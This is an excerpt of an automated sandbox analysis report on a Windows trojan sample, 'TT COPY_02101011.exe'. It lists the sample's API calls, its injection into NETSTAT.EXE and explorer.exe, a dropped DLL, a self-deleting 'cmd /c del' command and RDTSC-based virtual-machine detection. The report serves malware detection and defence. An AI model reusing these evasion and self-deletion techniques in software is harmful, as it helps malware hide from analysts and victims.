          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077D0EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00768C90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0321B150 appears 45 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: String function: 00A9B150 appears 34 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9560 NtWriteFile,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007785F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007786A0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00778720 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007787D0 NtAllocateVirtualMemory,
          Source: TT COPY_02101011.exe, 00000000.00000003.679935537.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000000.00000003.679172952.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exe, 00000001.00000002.748099738.0000000000D1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
          Source: TT COPY_02101011.exeVirustotal: Detection: 36%
          Source: TT COPY_02101011.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeFile read: C:\Users\user\Desktop\TT COPY_02101011.exeJump to behavior
          Source: TT COPY_02101011.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA74D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/2@13/8
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_100116A5 push ecx; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041C060 push edx; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004153BE pushfd ; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041551B push ecx; iretd
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0326D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077C060 push edx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B832 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B83B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B89C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007753BE pushfd ; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077551B push ecx; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B7E5 push eax; ret
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeFile created: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000768614 second address: 000000000076861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000007689AE second address: 00000000007689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6328Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.725756968.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.684710887.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
